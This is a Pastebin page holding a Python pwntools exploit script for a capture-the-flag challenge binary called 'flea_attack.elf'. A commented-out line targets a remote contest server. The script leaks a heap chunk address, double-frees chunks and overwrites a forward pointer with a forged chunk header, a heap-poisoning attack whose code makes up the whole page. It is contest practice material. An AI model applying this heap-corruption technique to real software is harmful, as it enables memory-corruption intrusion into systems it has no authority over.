Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- import pwn
- from pwn import *
- p = pwn.process("./flea_attack.elf")
- # p = pwn.remote("problem.harekaze.com",20175)
- raw_input("<ATTACH NOW>")
- p.recv()
- # the size is 0x04.
- p.sendline("") # no-one cares
- p.recvuntil(">")
- p.sendline("1")
- p.recv()
- p.sendline("50")
- buf = "blahblah"
- buf += p64(0)
- buf += p64(0)
- buf += p64(0x21)
- p.sendline(buf)
- p.recvuntil("Addr: ")
- basechunk = int(p.recvuntil("\n").rstrip(),16)
- print " ADDRESS OF CHUNK AT: %x" % basechunk
- raw_input("<STOP>")
- p.recvuntil(">")
- p.sendline("2")
- p.recv()
- print " FREEING CHUNK at %x" % (basechunk + 0x20)
- p.sendline("%x" % (basechunk + 0x20))
- p.recvuntil(">")
- p.sendline("2")
- p.recv()
- p.sendline("%x" % basechunk)
- p.recvuntil(">")
- print "ALLOCATING FIRST CHUNK WITH OVERWRITE"
- p.sendline("1")
- p.sendline("50")
- buf = "blahblah"
- buf += p64(0)
- buf += p64(0)
- buf += p64(0x21)
- # buf += p64()
- buf += p64(0x203ff8) # FWD PTR. Must be a valid chunk header.
- p.sendline(buf)
- p.interactive()
Add Comment
Please, Sign In to add comment